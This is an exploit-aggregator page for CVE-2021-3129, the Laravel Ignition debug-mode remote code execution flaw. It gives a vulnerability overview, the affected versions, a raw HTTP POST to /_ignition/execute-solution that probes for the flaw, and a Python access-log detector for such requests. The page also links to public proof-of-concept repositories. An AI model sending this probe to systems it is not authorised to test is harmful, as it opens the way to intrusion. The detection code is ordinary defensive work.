## https://sploitus.com/exploit?id=7391B704-6E84-5129-A413-83DD4C822DCA
# CVE-2021-3129
Laravel RCE CVE-2021-3129

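# Vulnerability overview
When Laravel runs with Debug mode enabled, the Ignition component that ships with Laravel uses file_get_contents() and file_put_contents() unsafely. An attacker can send malicious requests, craft a malicious log file, and by similar means trigger Phar deserialization, which ultimately leads to remote code execution.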


# Affected versions
Laravel <= 8.4.2


# Vulnerability verification
- A 500 response indicates the vulnerability is present
```
POST /_ignition/execute-solution HTTP/1.1
Host: 192.168.24.153:8888
Accept: application/json
Content-Type: application/x-www-form-urlencoded
Content-Length: 133

solution=Facade\Ignition\Solutions\MakeViewVariableOptionalSolution&parameters[variableName]=cve20213129&parameters[viewFile]=null
```
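
For defenders, the request above leaves a recognizable trace in web server access logs. The following is an added example, not part of the original repository: it scans access-log text for POST requests to `/_ignition/execute-solution` and ranks them by response status. It assumes the combined log format; the sample lines are constructed, and the severity mapping and function names are this example's own assumptions.

```python
import re

# Combined Log Format: ip ident user [time] "METHOD path PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
IGNITION_PATH = "/_ignition/execute-solution"

# Constructed sample lines (documentation IP ranges, not from a real server).
SAMPLE_LOG = """\
203.0.113.7 - - [11/Mar/2023:22:30:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "curl/7.88"
203.0.113.7 - - [11/Mar/2023:22:30:05 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 2841 "-" "-"
203.0.113.7 - - [11/Mar/2023:22:30:06 +0000] "POST /_ignition/execute-solution?x=1 HTTP/1.1" 200 2 "-" "-"
198.51.100.20 - - [11/Mar/2023:22:31:00 +0000] "POST /_ignition/execute-solution HTTP/1.1" 404 153 "-" "-"
198.51.100.21 - - [11/Mar/2023:22:32:00 +0000] "GET /_ignition/health-check HTTP/1.1" 200 40 "-" "-"
this line is malformed and must be skipped
"""

def classify(status):
    """Triage severity for a hit (assumed mapping, adjust to local policy)."""
    if status == 500 or 200 <= status < 300:
        # 500 is the result the verification step treats as vulnerable;
        # 2xx means the debug endpoint was reachable and handled the POST.
        return "high"
    return "low"  # e.g. 403/404/405: endpoint absent or blocked

def find_ignition_hits(log_text):
    """Return one dict per POST to the Ignition solution endpoint."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        path = m["path"].split("?", 1)[0].rstrip("/")  # drop query string
        if path != IGNITION_PATH:
            continue
        status = int(m["status"])
        hits.append({"ip": m["ip"], "time": m["time"],
                     "status": status, "severity": classify(status)})
    return hits

def worst_by_ip(hits):
    """Collapse hits to the highest severity seen per source address."""
    out = {}
    for h in hits:
        if out.get(h["ip"]) != "high":
            out[h["ip"]] = h["severity"]
    return out

if __name__ == "__main__":
    for hit in find_ignition_hits(SAMPLE_LOG):
        print(hit)
```

Any "high" hit on a production host also means Debug mode is exposed there, which is the precondition named in the overview.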


# Exploit script
![image](https://github.com/keyuan15/CVE-2021-3129/blob/main/img/Pasted%20image%2020230311223255.png)


# References
[[CVE-2021-3129] Laravel Debug mode RCE reproduction | tyskillのBlog](https://tyskill.github.io/posts/cve_2021_3129/)

[SNCKER/CVE-2021-3129: Laravel debug rce (github.com)](https://github.com/SNCKER/CVE-2021-3129)

[zhzyker/CVE-2021-3129: Laravel <= v8.4.2 debug mode: Remote code execution (CVE-2021-3129) (github.com)](https://github.com/zhzyker/CVE-2021-3129)